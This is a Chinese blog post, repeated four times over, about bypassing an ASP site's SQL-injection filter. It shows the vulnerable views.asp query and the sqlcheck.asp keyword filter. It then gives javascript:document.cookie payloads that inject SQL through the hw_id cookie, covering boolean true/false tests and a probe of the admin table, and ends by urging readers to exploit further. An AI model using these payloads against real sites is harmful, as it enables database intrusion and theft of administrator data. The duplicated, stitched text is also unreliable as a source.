rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(43055) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(43054) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(43053) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(43052) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~